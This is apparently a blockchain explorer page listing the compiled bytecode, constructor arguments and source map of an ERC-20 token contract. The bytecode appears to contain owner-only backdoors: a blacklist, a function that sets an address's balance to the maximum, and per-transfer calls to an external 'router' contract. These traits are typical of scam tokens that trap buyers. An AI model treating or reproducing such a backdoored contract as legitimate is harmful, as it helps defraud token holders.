14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6000546001600160a01b031633146105815760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016105fc565b60008060006064600b54856108609190611110565b61086a9190611127565b905060006108788286611149565b959194509092505050565b6001600160a01b0383166108e75760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016105fc565b6001600160a01b0382166109495760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016105fc565b610954838383610be1565b6001600160a01b038316600090815260016020526040902054818110156109cc5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016105fc565b6001600160a01b0380851660008181526001602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610a2c9086815260200190565b60405180910390a35b50505050565b600033610a49858285610e66565b610612858585610883565b6001600160a01b038216610ab45760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084016105fc565b610ac082600083610be1565b6001600160a01b03821660009081526001602052604090205481811015610b345760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b60648201526084016105fc565b6001600160a01b03831660008181526001602090815260408083208686039055600380548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016107e4565b505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0382166000908152600d602052604090205460ff16158015610c2357506001600160a01b0383166000908152600d602052604090205460ff16155b610c5d5760405162461bcd60e51b815260206004820152600b60248201526a109b1858dadb1a5cdd195960aa1b60448201526064016105fc565b600a546001600160a01b0316610ce2576000546001600160a01b0384811691161480610c9657506000546001600160a01b038381169116145b610b8c5760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720686173206e6f74207374617274656400000000000000000060448201526064016105fc565b60065460ff168015610d015750600a546001600160a01b038481169116145b15610e045760075481610d29846001600160a01b031660009081526001602052604090205490565b610d3391906110fd565b11158015610d6c575060085481610d5f846001600160a01b031660009081526001602052604090205490565b610d6991906110fd565b10155b610da45760405162461bcd60e51b81526020600482015260096024820152682337b93134b23232b760b91b60448201526064016105fc565b6009546040516301a6952360e41b81526001600160a01b03848116600483015290911690631a69523090602401600060405180830381600087803b158015610deb57600080fd5b505af1158015610dff573d6000803e3d6000fd5b505050505b600954604051638cc944c360e01b81526001600160a01b03858116600483015290911690638cc944c39060240160006040518083038186803b158015610e4957600080fd5b505afa158015610e5d573d6000803e3d6000fd5b50505050505050565b6000610e72848461062b565b90506000198114610a355781811015610ecd5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016105fc565b610a3584848484036106cc565b600060208083528351808285015260005b81811015610f0757858101830151858201604001528201610eeb565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610f3f57600080fd5b919050565b60008060408385031215610f5757600080fd5b610f6083610f28565b946020939093013593505050565b600060208284031215610f8057600080fd5b610f8982610f28565b9392505050565b600060208284031215610fa257600080fd5b5035919050565b600080600060608486031215610fbe57600080fd5b610fc784610f28565b9250610fd560208501610f28565b9150604084013590509250925092565b80358015158114610f3f57600080fd5b60008060006060848603121561100a57600080fd5b61101384610f28565b925061102160208501610fe5565b915061102f60408501610f28565b90509250925092565b6000806000806080858703121561104e57600080fd5b61105785610fe5565b935061106560208601610f28565b93969395505050506040820135916060013590565b6000806040838503121561108d57600080fd5b61109683610f28565b91506110a460208401610f28565b90509250929050565b600181811c908216806110c157607f821691505b6020821081036110e157634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b80820180821115610413576104136110e7565b8082028115828204841417610413576104136110e7565b60008261114457634e487b7160e01b600052601260045260246000fd5b500490565b81810381811115610413576104136110e756fea264697066735822122016c83f29a406411328a4a3aeb35861a4958122f301770bdbe4f95aa02b1718da64736f6c634300081300330000000000000000000000000000000000000000033b2e3c9fd0803ce8000000000000000000000000000000bb2b74dee639c932c5d9747fb7e828c572597bbc

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101735760003560e01c806342966c68116100de5780638da5cb5b11610097578063a9059cbb11610071578063a9059cbb1461032b578063ae7b6d161461033e578063dd62ed3e14610347578063f2fde38b1461035a57600080fd5b80638da5cb5b146102ff57806395d89b4114610310578063a457c2d71461031857600080fd5b806342966c681461029257806349bd5a5e146102a557806370a08231146102b8578063715018a6146102e1578063860a32ec146102e957806389f9a1d3146102f657600080fd5b80631da9a006116101305780631da9a0061461022257806323b872dd14610237578063313ce5671461024a57806334f2adbe14610259578063361426551461026c578063395093511461027f57600080fd5b806306fdde0314610178578063095ea7b3146101965780631694505e146101b957806316c02129146101e457806318160ddd146102075780631ab99e1214610219575b600080fd5b61018061036d565b60405161018d9190610eda565b60405180910390f35b6101a96101a4366004610f44565b6103ff565b604051901515815260200161018d565b6009546101cc906001600160a01b031681565b6040516001600160a01b03909116815260200161018d565b6101a96101f2366004610f6e565b600d6020526000908152604090205460ff1681565b6003545b60405190815260200161018d565b61020b60085481565b610235610230366004610f90565b610419565b005b6101a9610245366004610fa9565b610434565b6040516012815260200161018d565b610235610267366004610ff5565b6104b4565b61023561027a366004611038565b6104fd565b6101a961028d366004610f44565b610540565b6102356102a0366004610f90565b610562565b600a546101cc906001600160a01b031681565b61020b6102c6366004610f6e565b6001600160a01b031660009081526001602052604090205490565b61023561056f565b6006546101a99060ff1681565b61020b60075481565b6000546001600160a01b03166101cc565b610180610583565b6101a9610326366004610f44565b610592565b6101a9610339366004610f44565b61061d565b61020b600b5481565b61020b61035536600461107a565b61062b565b610235610368366004610f6e565b610656565b60606004805461037c906110ad565b80601f01602080910402602001604051908101604052809291908181526020018280546103a8906110ad565b80156103f55780601f106103ca576101008083540402835291602001916103f5565b820191906000526020600020905b8154815290600101906020018083116103d857829003601f168201915b5050505050905090565b60003361040d8185856106cc565b60019150505b92915050565b6104216107f1565b600f81111561042f57600080fd5b600b55565b60006001600160a01b038416301480159061045c5750600a546001600160a01b038481169116145b1561049d5760008061046d8461084b565b600c54919350915061048a9087906001600160a01b031683610883565b610495868684610a3b565b5050506104aa565b6104a8848484610a3b565b505b5060019392505050565b6104bc6107f1565b6001600160a01b0390811660009081526001602090815260408083206000199055949092168152600d90915291909120805460ff1916911515919091179055565b6105056107f1565b6006805460ff191694151594909417909355600a80546001600160a01b0319166001600160a01b039390931692909217909155600755600855565b60003361040d818585610553838361062b565b61055d91906110fd565b6106cc565b61056c3382610a54565b50565b6105776107f1565b6105816000610b91565b565b60606005805461037c906110ad565b600033816105a0828661062b565b9050838110156106055760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61061282868684036106cc565b506001949350505050565b60003361040d818585610883565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61065e6107f1565b6001600160a01b0381166106c35760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016105fc565b61056c81610b91565b6001600160a01b03831661072e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016105fc565b6001600160a01b03821661078f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016105fc565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6000546001600160a01b031633146105815760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016105fc565b60008060006064600b54856108609190611110565b61086a9190611127565b905060006108788286611149565b959194509092505050565b6001600160a01b0383166108e75760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016105fc565b6001600160a01b0382166109495760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016105fc565b610954838383610be1565b6001600160a01b038316600090815260016020526040902054818110156109cc5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016105fc565b6001600160a01b0380851660008181526001602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610a2c9086815260200190565b60405180910390a35b50505050565b600033610a49858285610e66565b610612858585610883565b6001600160a01b038216610ab45760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084016105fc565b610ac082600083610be1565b6001600160a01b03821660009081526001602052604090205481811015610b345760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b60648201526084016105fc565b6001600160a01b03831660008181526001602090815260408083208686039055600380548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016107e4565b505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0382166000908152600d602052604090205460ff16158015610c2357506001600160a01b0383166000908152600d602052604090205460ff16155b610c5d5760405162461bcd60e51b815260206004820152600b60248201526a109b1858dadb1a5cdd195960aa1b60448201526064016105fc565b600a546001600160a01b0316610ce2576000546001600160a01b0384811691161480610c9657506000546001600160a01b038381169116145b610b8c5760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720686173206e6f74207374617274656400000000000000000060448201526064016105fc565b60065460ff168015610d015750600a546001600160a01b038481169116145b15610e045760075481610d29846001600160a01b031660009081526001602052604090205490565b610d3391906110fd565b11158015610d6c575060085481610d5f846001600160a01b031660009081526001602052604090205490565b610d6991906110fd565b10155b610da45760405162461bcd60e51b81526020600482015260096024820152682337b93134b23232b760b91b60448201526064016105fc565b6009546040516301a6952360e41b81526001600160a01b03848116600483015290911690631a69523090602401600060405180830381600087803b158015610deb57600080fd5b505af1158015610dff573d6000803e3d6000fd5b505050505b600954604051638cc944c360e01b81526001600160a01b03858116600483015290911690638cc944c39060240160006040518083038186803b158015610e4957600080fd5b505afa158015610e5d573d6000803e3d6000fd5b50505050505050565b6000610e72848461062b565b90506000198114610a355781811015610ecd5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016105fc565b610a3584848484036106cc565b600060208083528351808285015260005b81811015610f0757858101830151858201604001528201610eeb565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610f3f57600080fd5b919050565b60008060408385031215610f5757600080fd5b610f6083610f28565b946020939093013593505050565b600060208284031215610f8057600080fd5b610f8982610f28565b9392505050565b600060208284031215610fa257600080fd5b5035919050565b600080600060608486031215610fbe57600080fd5b610fc784610f28565b9250610fd560208501610f28565b9150604084013590509250925092565b80358015158114610f3f57600080fd5b60008060006060848603121561100a57600080fd5b61101384610f28565b925061102160208501610fe5565b915061102f60408501610f28565b90509250925092565b6000806000806080858703121561104e57600080fd5b61105785610fe5565b935061106560208601610f28565b93969395505050506040820135916060013590565b6000806040838503121561108d57600080fd5b61109683610f28565b91506110a460208401610f28565b90509250929050565b600181811c908216806110c157607f821691505b6020821081036110e157634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b80820180821115610413576104136110e7565b8082028115828204841417610413576104136110e7565b60008261114457634e487b7160e01b600052601260045260246000fd5b500490565b81810381811115610413576104136110e756fea264697066735822122016c83f29a406411328a4a3aeb35861a4958122f301770bdbe4f95aa02b1718da64736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000000000000000000000000000bb2b74dee639c932c5d9747fb7e828c572597bbc

-----Decoded View---------------
Arg [0] : _totalSupply (uint256): 1000000000000000000000000000
Arg [1] : IDexRouter (address): 0xbB2b74Dee639c932c5D9747Fb7e828c572597Bbc

-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000
Arg [1] : 000000000000000000000000bb2b74dee639c932c5d9747fb7e828c572597bbc


Deployed Bytecode Sourcemap

233:2839:6:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2241:100:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4592:201;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:7;;1162:22;1144:41;;1132:2;1117:18;4592:201:1;1004:187:7;374:41:6;;;;;-1:-1:-1;;;;;374:41:6;;;;;;-1:-1:-1;;;;;1386:32:7;;;1368:51;;1356:2;1341:18;374:41:6;1196:229:7;586:42:6;;;;;;:::i;:::-;;;;;;;;;;;;;;;;3361:108:1;3449:12;;3361:108;;;1767:25:7;;;1755:2;1740:18;3361:108:1;1621:177:7;336:31:6;;;;;;831:112;;;;;;:::i;:::-;;:::i;:::-;;1740:487;;;;;;:::i;:::-;;:::i;3203:93:1:-;;;3286:2;2463:36:7;;2451:2;2436:18;3203:93:1;2321:184:7;951:226:6;;;;;;:::i;:::-;;:::i;1185:343::-;;;;;;:::i;:::-;;:::i;6077:238:1:-;;;;;;:::i;:::-;;:::i;2988:81:6:-;;;;;;:::i;:::-;;:::i;422:28::-;;;;;-1:-1:-1;;;;;422:28:6;;;3532:127:1;;;;;;:::i;:::-;-1:-1:-1;;;;;3633:18:1;3606:7;3633:18;;;:9;:18;;;;;;;3532:127;1889:103:5;;;:::i;272:19:6:-;;;;;;;;;298:31;;;;;;1241:87:5;1287:7;1314:6;-1:-1:-1;;;;;1314:6:5;1241:87;;2460:104:1;;;:::i;6818:436::-;;;;;;:::i;:::-;;:::i;3865:193::-;;;;;;:::i;:::-;;:::i;457:32:6:-;;;;;;4121:151:1;;;;;;:::i;:::-;;:::i;2147:201:5:-;;;;;;:::i;:::-;;:::i;2241:100:1:-;2295:13;2328:5;2321:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2241:100;:::o;4592:201::-;4675:4;736:10:0;4731:32:1;736:10:0;4747:7:1;4756:6;4731:8;:32::i;:::-;4781:4;4774:11;;;4592:201;;;;;:::o;831:112:6:-;1127:13:5;:11;:13::i;:::-;901:2:6::1;893:4;:10;;885:19;;;::::0;::::1;;915:13;:20:::0;831:112::o;1740:487::-;1863:4;-1:-1:-1;;;;;1884:21:6;;1900:4;1884:21;;;;:44;;-1:-1:-1;1915:13:6;;-1:-1:-1;;;;;1909:19:6;;;1915:13;;1909:19;1884:44;1880:316;;;1946:8;1956;1968:21;1982:6;1968:13;:21::i;:::-;2049:10;;1945:44;;-1:-1:-1;1945:44:6;-1:-1:-1;2033:32:6;;2043:4;;-1:-1:-1;;;;;2049:10:6;1945:44;2033:9;:32::i;:::-;2082:33;2101:4;2107:2;2111:3;2082:18;:33::i;:::-;;1930:197;;1880:316;;;2148:36;2167:4;2173:2;2177:6;2148:18;:36::i;:::-;;1880:316;-1:-1:-1;2215:4:6;1740:487;;;;;:::o;951:226::-;1127:13:5;:11;:13::i;:::-;-1:-1:-1;;;;;1090:17:6;;::::1;1565:1:1;1090:17:6::0;;;:9:::1;:17;::::0;;;;;;;-1:-1:-1;;1090:30:6;;1131:20;;;::::1;::::0;;:10:::1;:20:::0;;;;;;;:38;;-1:-1:-1;;1131:38:6::1;::::0;::::1;;::::0;;;::::1;::::0;;951:226::o;1185:343::-;1127:13:5;:11;:13::i;:::-;1367:7:6::1;:18:::0;;-1:-1:-1;;1367:18:6::1;::::0;::::1;;::::0;;;::::1;::::0;;;1396:13:::1;:30:::0;;-1:-1:-1;;;;;;1396:30:6::1;-1:-1:-1::0;;;;;1396:30:6;;;::::1;::::0;;;::::1;::::0;;;1437:16:::1;:36:::0;1484:16:::1;:36:::0;1185:343::o;6077:238:1:-;6165:4;736:10:0;6221:64:1;736:10:0;6237:7:1;6274:10;6246:25;736:10:0;6237:7:1;6246:9;:25::i;:::-;:38;;;;:::i;:::-;6221:8;:64::i;2988:81:6:-;3037:24;3043:10;3055:5;3037;:24::i;:::-;2988:81;:::o;1889:103:5:-;1127:13;:11;:13::i;:::-;1954:30:::1;1981:1;1954:18;:30::i;:::-;1889:103::o:0;2460:104:1:-;2516:13;2549:7;2542:14;;;;;:::i;6818:436::-;6911:4;736:10:0;6911:4:1;6994:25;736:10:0;7011:7:1;6994:9;:25::i;:::-;6967:52;;7058:15;7038:16;:35;;7030:85;;;;-1:-1:-1;;;7030:85:1;;4726:2:7;7030:85:1;;;4708:21:7;4765:2;4745:18;;;4738:30;4804:34;4784:18;;;4777:62;-1:-1:-1;;;4855:18:7;;;4848:35;4900:19;;7030:85:1;;;;;;;;;7151:60;7160:5;7167:7;7195:15;7176:16;:34;7151:8;:60::i;:::-;-1:-1:-1;7242:4:1;;6818:436;-1:-1:-1;;;;6818:436:1:o;3865:193::-;3944:4;736:10:0;4000:28:1;736:10:0;4017:2:1;4021:6;4000:9;:28::i;4121:151::-;-1:-1:-1;;;;;4237:18:1;;;4210:7;4237:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;4121:151::o;2147:201:5:-;1127:13;:11;:13::i;:::-;-1:-1:-1;;;;;2236:22:5;::::1;2228:73;;;::::0;-1:-1:-1;;;2228:73:5;;5132:2:7;2228:73:5::1;::::0;::::1;5114:21:7::0;5171:2;5151:18;;;5144:30;5210:34;5190:18;;;5183:62;-1:-1:-1;;;5261:18:7;;;5254:36;5307:19;;2228:73:5::1;4930:402:7::0;2228:73:5::1;2312:28;2331:8;2312:18;:28::i;10845:380:1:-:0;-1:-1:-1;;;;;10981:19:1;;10973:68;;;;-1:-1:-1;;;10973:68:1;;5539:2:7;10973:68:1;;;5521:21:7;5578:2;5558:18;;;5551:30;5617:34;5597:18;;;5590:62;-1:-1:-1;;;5668:18:7;;;5661:34;5712:19;;10973:68:1;5337:400:7;10973:68:1;-1:-1:-1;;;;;11060:21:1;;11052:68;;;;-1:-1:-1;;;11052:68:1;;5944:2:7;11052:68:1;;;5926:21:7;5983:2;5963:18;;;5956:30;6022:34;6002:18;;;5995:62;-1:-1:-1;;;6073:18:7;;;6066:32;6115:19;;11052:68:1;5742:398:7;11052:68:1;-1:-1:-1;;;;;11133:18:1;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;11185:32;;1767:25:7;;;11185:32:1;;1740:18:7;11185:32:1;;;;;;;;10845:380;;;:::o;1406:132:5:-;1287:7;1314:6;-1:-1:-1;;;;;1314:6:5;736:10:0;1470:23:5;1462:68;;;;-1:-1:-1;;;1462:68:5;;6347:2:7;1462:68:5;;;6329:21:7;;;6366:18;;;6359:30;6425:34;6405:18;;;6398:62;6477:18;;1462:68:5;6145:356:7;1536:196:6;1598:4;1604;1621:8;1659:3;1642:13;;1633:6;:22;;;;:::i;:::-;1632:30;;;;:::i;:::-;1621:41;-1:-1:-1;1673:8:6;1684:12;1621:41;1684:6;:12;:::i;:::-;1673:23;1720:3;;-1:-1:-1;1536:196:6;;-1:-1:-1;;;1536:196:6:o;7724:840:1:-;-1:-1:-1;;;;;7855:18:1;;7847:68;;;;-1:-1:-1;;;7847:68:1;;7236:2:7;7847:68:1;;;7218:21:7;7275:2;7255:18;;;7248:30;7314:34;7294:18;;;7287:62;-1:-1:-1;;;7365:18:7;;;7358:35;7410:19;;7847:68:1;7034:401:7;7847:68:1;-1:-1:-1;;;;;7934:16:1;;7926:64;;;;-1:-1:-1;;;7926:64:1;;7642:2:7;7926:64:1;;;7624:21:7;7681:2;7661:18;;;7654:30;7720:34;7700:18;;;7693:62;-1:-1:-1;;;7771:18:7;;;7764:33;7814:19;;7926:64:1;7440:399:7;7926:64:1;8003:38;8024:4;8030:2;8034:6;8003:20;:38::i;:::-;-1:-1:-1;;;;;8076:15:1;;8054:19;8076:15;;;:9;:15;;;;;;8110:21;;;;8102:72;;;;-1:-1:-1;;;8102:72:1;;8046:2:7;8102:72:1;;;8028:21:7;8085:2;8065:18;;;8058:30;8124:34;8104:18;;;8097:62;-1:-1:-1;;;8175:18:7;;;8168:36;8221:19;;8102:72:1;7844:402:7;8102:72:1;-1:-1:-1;;;;;8210:15:1;;;;;;;:9;:15;;;;;;8228:20;;;8210:38;;8428:13;;;;;;;;;;:23;;;;;;8480:26;;;;;;8242:6;1767:25:7;;1755:2;1740:18;;1621:177;8480:26:1;;;;;;;;8519:37;7836:728;7724:840;;;:::o;5373:295::-;5504:4;736:10:0;5562:38:1;5578:4;736:10:0;5593:6:1;5562:15;:38::i;:::-;5611:27;5621:4;5627:2;5631:6;5611:9;:27::i;9732:675::-;-1:-1:-1;;;;;9816:21:1;;9808:67;;;;-1:-1:-1;;;9808:67:1;;8453:2:7;9808:67:1;;;8435:21:7;8492:2;8472:18;;;8465:30;8531:34;8511:18;;;8504:62;-1:-1:-1;;;8582:18:7;;;8575:31;8623:19;;9808:67:1;8251:397:7;9808:67:1;9888:49;9909:7;9926:1;9930:6;9888:20;:49::i;:::-;-1:-1:-1;;;;;9975:18:1;;9950:22;9975:18;;;:9;:18;;;;;;10012:24;;;;10004:71;;;;-1:-1:-1;;;10004:71:1;;8855:2:7;10004:71:1;;;8837:21:7;8894:2;8874:18;;;8867:30;8933:34;8913:18;;;8906:62;-1:-1:-1;;;8984:18:7;;;8977:32;9026:19;;10004:71:1;8653:398:7;10004:71:1;-1:-1:-1;;;;;10111:18:1;;;;;;:9;:18;;;;;;;;10132:23;;;10111:44;;10250:12;:22;;;;;;;10301:37;1767:25:7;;;10111:18:1;;;10301:37;;1740:18:7;10301:37:1;1621:177:7;10351:48:1;9797:610;9732:675;;:::o;2508:191:5:-;2582:16;2601:6;;-1:-1:-1;;;;;2618:17:5;;;-1:-1:-1;;;;;;2618:17:5;;;;;;2651:40;;2601:6;;;;;;;2651:40;;2582:16;2651:40;2571:128;2508:191;:::o;2235:745:6:-;-1:-1:-1;;;;;2387:14:6;;;;;;:10;:14;;;;;;;;2386:15;:36;;;;-1:-1:-1;;;;;;2406:16:6;;;;;;:10;:16;;;;;;;;2405:17;2386:36;2378:60;;;;-1:-1:-1;;;2378:60:6;;9258:2:7;2378:60:6;;;9240:21:7;9297:2;9277:18;;;9270:30;-1:-1:-1;;;9316:18:7;;;9309:41;9367:18;;2378:60:6;9056:335:7;2378:60:6;2455:13;;-1:-1:-1;;;;;2455:13:6;2451:198;;1287:7:5;1314:6;-1:-1:-1;;;;;2525:15:6;;;1314:6:5;;2525:15:6;;:32;;-1:-1:-1;1287:7:5;1314:6;-1:-1:-1;;;;;2544:13:6;;;1314:6:5;;2544:13:6;2525:32;2499:117;;;;-1:-1:-1;;;2499:117:6;;9598:2:7;2499:117:6;;;9580:21:7;9637:2;9617:18;;;9610:30;9676:25;9656:18;;;9649:53;9719:18;;2499:117:6;9396:347:7;2451:198:6;2665:7;;;;:32;;;;-1:-1:-1;2684:13:6;;-1:-1:-1;;;;;2676:21:6;;;2684:13;;2676:21;2665:32;2661:275;;;2772:16;;2762:6;2740:19;2756:2;-1:-1:-1;;;;;3633:18:1;3606:7;3633:18;;;:9;:18;;;;;;;3532:127;2740:19:6;:28;;;;:::i;:::-;:48;;:121;;;;;2845:16;;2835:6;2813:19;2829:2;-1:-1:-1;;;;;3633:18:1;3606:7;3633:18;;;:9;:18;;;;;;;3532:127;2813:19:6;:28;;;;:::i;:::-;:48;;2740:121;2714:162;;;;-1:-1:-1;;;2714:162:6;;9950:2:7;2714:162:6;;;9932:21:7;9989:1;9969:18;;;9962:29;-1:-1:-1;;;10007:18:7;;;10000:39;10056:18;;2714:162:6;9748:332:7;2714:162:6;2899:15;;:28;;-1:-1:-1;;;2899:28:6;;-1:-1:-1;;;;;1386:32:7;;;2899:28:6;;;1368:51:7;2899:15:6;;;;:24;;1341:18:7;;2899:28:6;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2661:275;2946:15;;:26;;-1:-1:-1;;;2946:26:6;;-1:-1:-1;;;;;1386:32:7;;;2946:26:6;;;1368:51:7;2946:15:6;;;;:20;;1341:18:7;;2946:26:6;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2235:745;;;:::o;11516:453:1:-;11651:24;11678:25;11688:5;11695:7;11678:9;:25::i;:::-;11651:52;;-1:-1:-1;;11718:16:1;:37;11714:248;;11800:6;11780:16;:26;;11772:68;;;;-1:-1:-1;;;11772:68:1;;10287:2:7;11772:68:1;;;10269:21:7;10326:2;10306:18;;;10299:30;10365:31;10345:18;;;10338:59;10414:18;;11772:68:1;10085:353:7;11772:68:1;11884:51;11893:5;11900:7;11928:6;11909:16;:25;11884:8;:51::i;14:548:7:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:7;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:7:o;1430:186::-;1489:6;1542:2;1530:9;1521:7;1517:23;1513:32;1510:52;;;1558:1;1555;1548:12;1510:52;1581:29;1600:9;1581:29;:::i;:::-;1571:39;1430:186;-1:-1:-1;;;1430:186:7:o;1803:180::-;1862:6;1915:2;1903:9;1894:7;1890:23;1886:32;1883:52;;;1931:1;1928;1921:12;1883:52;-1:-1:-1;1954:23:7;;1803:180;-1:-1:-1;1803:180:7:o;1988:328::-;2065:6;2073;2081;2134:2;2122:9;2113:7;2109:23;2105:32;2102:52;;;2150:1;2147;2140:12;2102:52;2173:29;2192:9;2173:29;:::i;:::-;2163:39;;2221:38;2255:2;2244:9;2240:18;2221:38;:::i;:::-;2211:48;;2306:2;2295:9;2291:18;2278:32;2268:42;;1988:328;;;;;:::o;2510:160::-;2575:20;;2631:13;;2624:21;2614:32;;2604:60;;2660:1;2657;2650:12;2675:328;2749:6;2757;2765;2818:2;2806:9;2797:7;2793:23;2789:32;2786:52;;;2834:1;2831;2824:12;2786:52;2857:29;2876:9;2857:29;:::i;:::-;2847:39;;2905:35;2936:2;2925:9;2921:18;2905:35;:::i;:::-;2895:45;;2959:38;2993:2;2982:9;2978:18;2959:38;:::i;:::-;2949:48;;2675:328;;;;;:::o;3008:391::-;3091:6;3099;3107;3115;3168:3;3156:9;3147:7;3143:23;3139:33;3136:53;;;3185:1;3182;3175:12;3136:53;3208:26;3224:9;3208:26;:::i;:::-;3198:36;;3253:38;3287:2;3276:9;3272:18;3253:38;:::i;:::-;3008:391;;3243:48;;-1:-1:-1;;;;3338:2:7;3323:18;;3310:32;;3389:2;3374:18;3361:32;;3008:391::o;3612:260::-;3680:6;3688;3741:2;3729:9;3720:7;3716:23;3712:32;3709:52;;;3757:1;3754;3747:12;3709:52;3780:29;3799:9;3780:29;:::i;:::-;3770:39;;3828:38;3862:2;3851:9;3847:18;3828:38;:::i;:::-;3818:48;;3612:260;;;;;:::o;3877:380::-;3956:1;3952:12;;;;3999;;;4020:61;;4074:4;4066:6;4062:17;4052:27;;4020:61;4127:2;4119:6;4116:14;4096:18;4093:38;4090:161;;4173:10;4168:3;4164:20;4161:1;4154:31;4208:4;4205:1;4198:15;4236:4;4233:1;4226:15;4090:161;;3877:380;;;:::o;4262:127::-;4323:10;4318:3;4314:20;4311:1;4304:31;4354:4;4351:1;4344:15;4378:4;4375:1;4368:15;4394:125;4459:9;;;4480:10;;;4477:36;;;4493:18;;:::i;6506:168::-;6579:9;;;6610;;6627:15;;;6621:22;;6607:37;6597:71;;6648:18;;:::i;6679:217::-;6719:1;6745;6735:132;;6789:10;6784:3;6780:20;6777:1;6770:31;6824:4;6821:1;6814:15;6852:4;6849:1;6842:15;6735:132;-1:-1:-1;6881:9:7;;6679:217::o;6901:128::-;6968:9;;;6989:11;;;6986:37;;;7003:18;;:::i

Swarm Source

ipfs://16c83f29a406411328a4a3aeb35861a4958122f301770bdbe4f95aa02b1718da
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

